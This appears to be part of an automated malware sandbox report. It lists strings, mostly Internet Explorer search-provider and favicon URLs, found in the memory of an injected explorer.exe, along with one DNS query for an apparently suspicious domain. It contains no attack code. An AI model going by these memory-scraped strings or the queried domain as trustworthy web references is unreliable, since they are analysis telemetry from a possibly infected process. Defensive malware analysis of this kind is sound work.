          Source: explorer.exe, 00000008.00000000.2216707466.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: www.thinking-diversity.com
          Source: explorer.exe, 00000008.00000000.2228808458.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2228808458.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2218367895.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2216707466.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000008.00000000.2216707466.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000008.00000000.2216995609.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000008.00000000.2216995609.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000008.00000000.2212012859.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000008.00000000.2216995609.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2218367895.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000008.00000000.2218367895.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000008.00000000.2216995609.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000008.00000000.2228808458.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000008.00000000.2212012859.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
